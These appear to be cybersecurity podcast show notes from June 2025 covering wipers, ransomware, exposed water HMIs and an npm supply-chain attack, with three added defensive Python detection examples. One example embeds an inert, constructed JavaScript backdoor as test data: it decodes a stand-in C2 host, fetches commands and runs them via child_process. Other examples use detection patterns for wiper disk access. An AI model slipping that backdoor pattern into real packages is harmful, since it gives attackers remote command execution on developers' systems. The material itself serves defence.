Good Morning Security Gang,
Welcome to another episode of the Cyber Hub Podcast with your comprehensive breakdown of the week's most critical cybersecurity developments. This Monday, June 9, 2025 edition delivers breaking analysis on President Trump's game-changing cybersecurity executive order, escalating Chinese cyber threats, and critical infrastructure vulnerabilities that demand immediate attention from security professionals worldwide.
Cyber Hub Podcast - June 9, 2025
Executive Summary
This episode provides in-depth coverage of President Trump's aggressive new cybersecurity executive order that directly names China as America's primary cyber adversary, alongside comprehensive reporting on mobile device attacks targeting government officials, ongoing cyber warfare in Ukraine, and critical infrastructure security gaps that expose millions of Americans to potential attacks.
Trump Administration Issues Sweeping Cybersecurity Executive Order
President Donald J. Trump has issued a comprehensive executive order amending two earlier cybersecurity directives (EO 13694 and EO 14144), marking a dramatic shift in America's cybersecurity strategy. The order explicitly names China, alongside Russia, Iran, and North Korea, as America's biggest cyber threats, abandoning diplomatic language in favor of direct acknowledgment of an ongoing cyber cold war.
The directive establishes three critical requirements with aggressive timelines: post-quantum cryptography implementation by 2030, immediate deployment of AI-powered cyber defenses, and new cybersecurity standards for all software and smart devices. The quantum threat is to public-key cryptography (RSA and elliptic-curve key exchange and signatures, which underpin TLS, VPNs, and code signing), not to symmetric ciphers such as AES-256, so the migration burden falls on enterprises just as much as on federal agencies: every system that terminates TLS or verifies signatures with those algorithms has to move.
The order mandates federal agencies transition to quantum-resistant encryption within four and a half years and requires identification of quantum-safe products by December 2025. However, the directive lacks clear enforcement mechanisms and funding sources, raising questions about implementation feasibility, especially given CISA's loss of 1,000 employees since the beginning of 2025.
Sophisticated Mobile Device Attacks Target Government Officials and Journalists
Cybersecurity investigators have identified an unusual pattern of smartphone crashes affecting government workers, politicians, journalists, and activists, believed to be part of a sophisticated zero-click attack campaign. The attacks, which began in late 2024 and continued into 2025, required no user interaction and left no obvious traces.
Researchers at iVerify discovered that all victims worked in fields of strategic interest to the Chinese government and had previously been targeted by Chinese threat actors. This represents an escalating trend of mobile devices becoming primary attack vectors as they increasingly contain sensitive personal and professional information.
The attacks highlight the vulnerability of smartphones as critical weak links in U.S. cyber defenses, with Chinese military and intelligence-linked groups specifically targeting prominent Americans' mobile devices through sophisticated techniques that bypass traditional security measures.
Russia Deploys New Wiper Malware Against Ukrainian Critical Infrastructure
The ongoing Russia-Ukraine conflict has witnessed the deployment of new destructive malware targeting Ukraine's critical infrastructure systems. Cisco Talos researchers have identified "PathWiper," a destructive wiper that shares similarities with the previously documented HermeticWiper, both attributed to the Russian threat group Sandworm.
The malware targets the master boot record and NTFS metadata artifacts such as the $MFT, $LogFile and $Boot, corrupting data across every connected drive and volume. Unlike its predecessor, which blindly iterates physical drive numbers, PathWiper enumerates and verifies the connected drives and volumes programmatically before overwriting them.
The attacks utilize legitimate endpoint administrative frameworks to execute malicious commands, making detection more challenging. This represents a concerning escalation in cyber warfare tactics that will likely migrate to civilian targets within one to two years, requiring immediate preparation by enterprise security teams worldwide.
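A worked detection example, added here and not taken from the Talos report or the podcast: a small Python correlator that scores endpoint telemetry for the two behaviours described above, raw handles opened on boot records and volumes, and a remote-administration agent spawning the process that does it. The event schema (Host, Event, Image, ParentImage, CommandLine, Device, TargetFilename) is an assumption modelled loosely on Sysmon, the agent names are placeholders, and the sample events are constructed.

```python
import json
import re
from collections import defaultdict

# Raw device handles a wiper opens to overwrite boot sectors and volumes:
# \\.\PhysicalDrive0, \\.\C:, \\?\Volume{guid}
RAW_DEVICE = re.compile(r"\\\\[.?]\\(PhysicalDrive\d+|[A-Za-z]:|Volume\{[0-9A-Fa-f-]+\})", re.I)
# NTFS metafiles whose destruction makes a volume unrecoverable
NTFS_METAFILE = re.compile(r"\\\$(MFT|MFTMirr|LogFile|Boot|Bitmap)(?::|$)", re.I)
# Endpoint-administration agents that legitimately spawn processes (assumed names for the demo)
ADMIN_AGENTS = {"rmmagent.exe", "endpointadmin.exe"}
SEVERITY = {"medium": 1, "high": 2, "critical": 3}


def _base(path):
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev):
    """Score a single event. Returns (severity, reason) or None when nothing stands out.
    A lone raw-device open is only 'medium' because backup and imaging tools do it too."""
    kind = ev.get("Event")
    image = _base(ev.get("Image", ""))
    parent = _base(ev.get("ParentImage", ""))
    if kind == "RawAccessRead" and RAW_DEVICE.search(ev.get("Device", "")):
        return ("medium", f"{image} opened raw device {ev['Device']}")
    if kind == "FileWrite" and NTFS_METAFILE.search(ev.get("TargetFilename", "")):
        return ("high", f"{image} wrote NTFS metafile {ev['TargetFilename']}")
    if kind == "ProcessCreate" and parent in ADMIN_AGENTS:
        cmd = ev.get("CommandLine", "")
        if RAW_DEVICE.search(cmd) or NTFS_METAFILE.search(cmd):
            return ("critical", f"{parent} spawned {image} aimed at a raw device: {cmd}")
        return ("medium", f"{parent} spawned unexpected child {image}")
    return None


def detect(lines):
    """Score each JSON event line, then correlate: one process opening two or more
    distinct drives/volumes on a host is the walk-every-drive pattern of a wiper."""
    alerts = []
    touched = defaultdict(set)  # (host, image) -> set of raw devices opened
    for line in lines:
        ev = json.loads(line)
        hit = score_event(ev)
        if hit:
            alerts.append({"host": ev["Host"], "severity": hit[0], "reason": hit[1]})
        if ev.get("Event") == "RawAccessRead":
            m = RAW_DEVICE.search(ev.get("Device", ""))
            if m:
                touched[(ev["Host"], _base(ev["Image"]))].add(m.group(0).lower())
    for (host, image), devices in touched.items():
        if len(devices) >= 2:
            alerts.append({"host": host, "severity": "critical",
                           "reason": f"{image} iterated {len(devices)} raw devices: {sorted(devices)}"})
    return alerts


def worst_per_host(alerts):
    """Collapse alerts to the highest severity seen on each host."""
    worst = {}
    for a in alerts:
        current = worst.get(a["host"])
        if current is None or SEVERITY[a["severity"]] > SEVERITY[current]:
            worst[a["host"]] = a["severity"]
    return worst


# Constructed sample telemetry (not real PathWiper artefacts): a legitimate backup read on
# two hosts, then an admin agent on hmi-01 pushing an unknown binary that walks every drive.
SAMPLE_EVENTS = [
    {"Host": "hmi-01", "Event": "RawAccessRead", "Image": r"C:\Program Files\Backup\vss.exe",
     "Device": r"\\.\C:"},
    {"Host": "hmi-01", "Event": "ProcessCreate", "ParentImage": r"C:\Agent\rmmagent.exe",
     "Image": r"C:\Windows\Temp\svc.exe", "CommandLine": "svc.exe"},
    {"Host": "hmi-01", "Event": "RawAccessRead", "Image": r"C:\Windows\Temp\svc.exe",
     "Device": r"\\.\PhysicalDrive0"},
    {"Host": "hmi-01", "Event": "RawAccessRead", "Image": r"C:\Windows\Temp\svc.exe",
     "Device": r"\\.\D:"},
    {"Host": "hmi-01", "Event": "RawAccessRead", "Image": r"C:\Windows\Temp\svc.exe",
     "Device": r"\\?\Volume{1f2e3d4c-5b6a-4d8e-9f00-100000000000}"},
    {"Host": "hmi-01", "Event": "FileWrite", "Image": r"C:\Windows\Temp\svc.exe",
     "TargetFilename": r"\\.\C:\$MFT"},
    {"Host": "eng-ws-07", "Event": "RawAccessRead", "Image": r"C:\Program Files\Backup\vss.exe",
     "Device": r"\\.\C:"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    found = detect(SAMPLE_LINES)
    for alert in found:
        print(alert["severity"].upper(), alert["host"], alert["reason"])
    print(worst_per_host(found))
```

The point of the correlation step is that no single event is conclusive: backup agents open raw volumes, and remote-administration tools spawn children all day. The wiper signature is the combination, an unfamiliar child of the admin agent that then touches every drive in turn, which is why the per-host roll-up lands on critical for hmi-01 and only medium for the workstation that saw a routine backup read.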
AT&T Data Breach: Old Data Re-emerges with New Criminal Activity
Threat actors have re-released data from AT&T's 2021 breach affecting 70 million customers, attempting to monetize previously disclosed information by repackaging it as new stolen data. The data appeared on Russian-speaking hacking forums with claims it originated from the 2024 AT&T Snowflake attack that exposed call logs of 109 million customers.
However, analysis by security researchers indicates the leaked information actually stems from the 2021 breach, representing a common criminal tactic of recycling old data for financial gain. This incident highlights the long-term impact of data breaches, where compromised information continues to circulate in criminal markets years after initial disclosure, creating ongoing privacy and security risks for affected customers.
Optima Tax Relief Suffers Ransomware Attack by Chaos Group
The Chaos ransomware group has successfully breached Optima Tax Relief, a leading U.S. tax resolution firm that claims to have resolved nearly $3 billion in tax liabilities for customers. The threat actors claim to have stolen 69 gigabytes of sensitive data and have added the company to their data leak site, threatening to release confidential client information.
Optima Tax Relief specializes in helping individuals and businesses address federal and state income tax issues, making the breach particularly concerning due to the sensitive financial and personal information involved. The Chaos ransomware group has also claimed responsibility for breaching the Salvation Army, though that organization has not responded to media inquiries about the attack.
Critical Water Utility Infrastructure Exposed to Internet
Security researchers at Censys have discovered hundreds of U.S. water utility control room dashboards directly accessible from the public internet, with dozens offering full, password-free control over critical infrastructure components including pumps, valves, and chemical feeds. The discovery began with routine scanning that identified TLS certificates containing "SCADA" labels, leading to the identification of vulnerable browser-based Human Machine Interface (HMI) platforms across three states.
Live screenshots revealed real-time operations including tank levels, chlorine pump cycles, and active alarm systems. The exposed systems ranged from read-only access to full unauthenticated control capabilities, representing a severe national security vulnerability. Due to the public utility nature of the targets, researchers bypassed standard disclosure processes and reported directly to the EPA and the unnamed HMI vendor for immediate remediation.
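An added example, not Censys's scanner or the HMI vendor's code: a Python triage over probe records for hosts you own, using the same starting signal the researchers did (ICS labels in the TLS certificate subject) and then grading what the default page hands an anonymous browser, from read-only process values up to start/stop and setpoint controls. The record fields, the host addresses and the HTML snippets are constructed for the demo; the keyword and control-widget lists are assumptions to tune for your own environment.

```python
import re

# Labels that mark a certificate or hostname as likely process-control equipment
ICS_KEYWORDS = re.compile(
    r"\b(SCADA|HMI|PLC|WTP|WWTP|LIFT\s?STATION|CHLORIN\w*|PUMP\s?STATION)\b", re.I)
# Page elements that let a visitor change the process rather than just watch it
CONTROL_WIDGET = re.compile(
    r"<(button|input|form|select)[^>]*(start|stop|setpoint|manual|write|command|open|close)", re.I)
# Ordered from least to most exposed
LEVELS = ["not-ics", "unknown", "auth-required", "view-unauth", "control-unauth"]


def parse_dn(dn):
    """Parse an RFC 4514-style subject such as 'CN=x, O=y' into a dict (no escape handling)."""
    fields = {}
    for part in dn.split(","):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip().upper()] = value.strip()
    return fields


def exposure(record):
    """Classify one probe result. Returns (level, reasons)."""
    subject = parse_dn(record["subject"])
    labels = " ".join([*subject.values(), *record.get("san", [])])
    reasons = []
    if not ICS_KEYWORDS.search(labels):
        return ("not-ics", reasons)
    reasons.append(f"ICS label in certificate: {labels}")
    status = record["status"]
    headers = {k.lower(): v for k, v in record.get("headers", {}).items()}
    if status in (401, 403) or "www-authenticate" in headers:
        reasons.append(f"HTTP {status}, authentication enforced")
        return ("auth-required", reasons)
    if status in (301, 302, 303, 307) and "login" in headers.get("location", "").lower():
        reasons.append("redirects to a login page")
        return ("auth-required", reasons)
    if status == 200 and CONTROL_WIDGET.search(record.get("body", "")):
        reasons.append("unauthenticated page exposes start/stop/setpoint controls")
        return ("control-unauth", reasons)
    if status == 200:
        reasons.append("unauthenticated page renders live process values (read-only)")
        return ("view-unauth", reasons)
    reasons.append(f"HTTP {status}, needs manual review")
    return ("unknown", reasons)


def triage(records):
    """Rank every record, most exposed first; returns (host, level, reasons) tuples."""
    ranked = [(r["host"], *exposure(r)) for r in records]
    ranked.sort(key=lambda t: LEVELS.index(t[1]), reverse=True)
    return ranked


# Constructed probe results (no real utility hosts): certificate subject, SAN list, and the
# first HTTP response from the default page, as a scanner or an asset inventory would record.
SAMPLE_RECORDS = [
    {"host": "203.0.113.10", "subject": "CN=SCADA-WTP-01, O=Example Water District", "status": 200,
     "body": '<h1>Plant Overview</h1><div id="tank1">63%</div>'
             '<button id="pump1_start">Start</button><input name="cl2_setpoint" value="1.8">'},
    {"host": "203.0.113.11", "subject": "CN=HMI-LiftStation-4, O=Example Water District",
     "status": 200, "body": '<div id="wetwell">41%</div><span id="pump2">RUN</span>'},
    {"host": "203.0.113.12", "subject": "CN=scada.example-utility.org",
     "san": ["scada.example-utility.org"], "status": 302, "headers": {"Location": "/login"}},
    {"host": "203.0.113.13", "subject": "CN=PLC-Gateway, OU=Operations", "status": 401,
     "headers": {"WWW-Authenticate": 'Basic realm="HMI"'}},
    {"host": "203.0.113.14", "subject": "CN=www.example-utility.org", "status": 200,
     "body": "<h1>Pay your bill</h1>"},
]

if __name__ == "__main__":
    for host, level, reasons in triage(SAMPLE_RECORDS):
        print(f"{level:15} {host}  {'; '.join(reasons)}")
```

Run against your own external inventory, the first line of output is the list to take off the internet today; the "view-unauth" tier is the one that still leaks alarm states and chemical dosing to anyone watching and belongs behind a VPN or an authenticating reverse proxy as well.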
FBI Warns of BadBox 2.0 Botnet Infecting Million+ Devices
The FBI has issued a critical warning about the BadBox 2.0 malware campaign that has infected over one million home internet-connected devices, primarily targeting Chinese Android-based smart TVs, streaming boxes, projectors, tablets, and IoT devices commonly purchased through platforms like AliExpress. The botnet converts consumer electronics into residential proxies used for various criminal activities including ad fraud and credential stuffing attacks.
These compromised devices maintain multiple backdoors to proxy services that criminal actors either sell or provide free access to for malicious purposes. Home users often become unwitting participants in cyber attacks, with their devices serving as waypoints in larger criminal operations rather than direct targets, highlighting the hidden risks of purchasing inexpensive electronic devices without proper security validation.
Supply Chain Attack Targets GlueStack Packages
Researchers have identified a sophisticated supply chain attack affecting over a dozen npm packages associated with GlueStack, collectively accounting for nearly one million weekly downloads. The malware was introduced through unauthorized changes to the lib/commonjs/index.js file in newly published versions of the packages, enabling attackers to execute shell commands, capture screenshots, and upload files from infected systems.
Aikido Security discovered the compromise, noting that affected machines could be used for cryptocurrency mining, sensitive data theft, and service disruption. The first compromised package was detected on June 6 at 9:33 PM GMT, demonstrating the rapid pace at which supply chain attacks can propagate through widely-used development frameworks.
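An added example of the check a consumer of these packages can run before accepting a version bump (not Aikido's tooling and not GlueStack's code): diff two extracted versions of a package and flag any file that gained shell-execution, dynamic-eval, network or base64-decoding capability, which is exactly what a UI component library's entry point should never acquire in a patch release. The package name, file contents and the inert "bad" release are constructed for the demo.

```python
import re
from difflib import unified_diff

# Capabilities a UI component library has no business gaining in a patch release
RISK_MARKERS = {
    "shell-exec": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)|\b(exec|spawn)(Sync)?\s*\("),
    "dyn-eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "network": re.compile(r"require\(\s*['\"](https?|net|dgram)['\"]\s*\)|\bfetch\s*\("),
    "obfuscation": re.compile(r"Buffer\.from\([^)]*,\s*['\"]base64['\"]\)|(\\x[0-9a-f]{2}){4,}", re.I),
}
BLOCKING = {"shell-exec", "dyn-eval"}


def risk_markers(source):
    """Return the set of risk marker names present in one file's source."""
    return {name for name, rx in RISK_MARKERS.items() if rx.search(source)}


def compare_versions(old, new):
    """old/new map relative file path -> content for two extracted package versions.
    Returns one finding per added, removed or modified file, with the risk markers the
    new content introduces and the size of the textual change."""
    findings = []
    for path in sorted(set(old) | set(new)):
        before, after = old.get(path), new.get(path)
        if before == after:
            continue
        change = "added" if before is None else "removed" if after is None else "modified"
        diff = unified_diff((before or "").splitlines(), (after or "").splitlines(), lineterm="")
        changed_lines = sum(1 for l in diff
                            if l.startswith(("+", "-")) and not l.startswith(("+++", "---")))
        findings.append({
            "path": path, "change": change, "changed_lines": changed_lines,
            "new_risk": sorted(risk_markers(after or "") - risk_markers(before or "")),
        })
    return findings


def verdict(findings):
    """BLOCK if any file gained shell or eval capability, REVIEW if any other new marker
    appeared, OK when no file gained a capability."""
    gained = {m for f in findings for m in f["new_risk"]}
    if gained & BLOCKING:
        return "BLOCK"
    return "REVIEW" if gained else "OK"


# Constructed package snapshots (a made-up package, not GlueStack's code). The "bad" release
# keeps package.json almost identical and hides the payload in the CommonJS entry point;
# the base64 string decodes to https://c2.example.invalid and nothing here is executed.
GOOD = {
    "package.json": '{"name":"@example/ui-button","version":"1.4.2","main":"lib/commonjs/index.js"}',
    "lib/commonjs/index.js": 'exports.Button = require("./Button");\n',
    "lib/commonjs/Button.js": 'exports.Button = function Button(props) { return props.label; };\n',
}
BAD = dict(GOOD)
BAD["package.json"] = GOOD["package.json"].replace("1.4.2", "1.4.3")
BAD["lib/commonjs/index.js"] = GOOD["lib/commonjs/index.js"] + (
    'const cp = require("child_process");\n'
    'const https = require("https");\n'
    'const beacon = Buffer.from("aHR0cHM6Ly9jMi5leGFtcGxlLmludmFsaWQ=", "base64").toString();\n'
    'https.get(beacon, res => res.on("data", cmd => cp.exec(String(cmd))));\n'
)
BENIGN_BUMP = dict(GOOD)
BENIGN_BUMP["package.json"] = BAD["package.json"]
BENIGN_BUMP["lib/commonjs/Button.js"] = GOOD["lib/commonjs/Button.js"].replace(
    "props.label", 'props.label || ""')

if __name__ == "__main__":
    for label, candidate in (("1.4.3 (malicious)", BAD), ("1.4.3 (benign)", BENIGN_BUMP)):
        findings = compare_versions(GOOD, candidate)
        print(label, "->", verdict(findings))
        for f in findings:
            print("  ", f["change"], f["path"], f["changed_lines"], "lines", f["new_risk"])
```

In practice the "old" side is the tarball already in your lockfile (the one your CI last built against) and the "new" side is what `npm pack` or the registry hands you for the bump; the comparison is cheap enough to run in a pre-merge job for every dependency update, and it catches the case a lockfile integrity hash cannot, a maliciously published version whose hash is perfectly valid.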
Qilin Ransomware Exploits Unpatched Fortinet Vulnerabilities
The Qilin ransomware operation, also tracked as Agenda since its emergence as a ransomware-as-a-service operation in August 2022, has begun actively exploiting two critical Fortinet vulnerabilities (CVE-2024-21762 and CVE-2024-55591) to deploy ransomware. The group has previously claimed major victims including automotive supplier Yanfeng, Lee Enterprises, Australia's Court Services Victoria, and pathology service provider Synnovis.
The Synnovis incident particularly impacted major NHS hospitals in London, forcing the cancellation of hundreds of medical appointments and surgical operations. CVE-2024-21762 is an out-of-bounds write in the FortiOS SSL VPN that allows unauthenticated remote code execution, and CVE-2024-55591 is an authentication bypass in FortiOS and FortiProxy; either one hands an attacker privileged access to an unpatched edge device without credentials, emphasizing the critical importance of immediate patch deployment for organizations using affected systems.
Action Items for Security Professionals
Immediate: Patch Fortinet devices against CVE-2024-21762 and CVE-2024-55591 to close the intrusion path Qilin ransomware affiliates are using
This Month: Audit all internet-facing industrial control systems and HMI platforms for unauthorized access
By December 2025: Identify and evaluate quantum-safe cryptographic products for federal compliance requirements
Ongoing: Implement enhanced mobile device security monitoring for high-value targets in government and media sectors
Strategic: Begin planning post-quantum cryptography migration timeline for 2030 compliance
Vendor Management: Audit supply chain security for JavaScript packages and development dependencies
Network Security: Review and segment IoT devices, particularly inexpensive consumer electronics from overseas manufacturers
Incident Response: Prepare wiper malware detection and recovery procedures based on evolving attack techniques
✅ Story Links:
https://apnews.com/article/china-cybersecurity-hacking-smartphones-37bb5f10c6e21fec2863b1faf269cecc
https://www.securityweek.com/destructive-pathwiper-targeting-ukraines-critical-infrastructure/
https://www.securityweek.com/misconfigured-hmis-expose-us-water-systems-to-anyone-with-a-browser/
https://thehackernews.com/2025/06/new-supply-chain-malware-operation-hits.html
🔔 Subscribe now for the latest insights from industry leaders, in-depth analyses, and real-world strategies to secure your digital world. https://www.youtube.com/@TheCyberHubPodcast/?sub_confirmation=1
🚨 Important Links to Follow:
👉Website:
👉Listen here: https://linktr.ee/cyberhubpodcast
✅ Stay Connected With Us.
👉Facebook: https://www.facebook.com/CyberHubpodcast/
👉LinkedIn: https://www.linkedin.com/company/cyberhubpodcast/
👉Twitter (X): https://twitter.com/cyberhubpodcast
👉Instagram: https://www.instagram.com/cyberhubpodcast
🤝 For Business Inquiries: info@cyberhubpodcast.com
=============================
🚀 About The CyberHub Podcast.
The Hub of the Infosec Community.
Our mission is to provide substantive and quality content that’s more than headlines or sales pitches. We want to be a valuable source to assist those cybersecurity practitioners in their mission to keep their organizations secure.
Tune in to our podcast Monday through Thursday at 9AM EST for the latest news.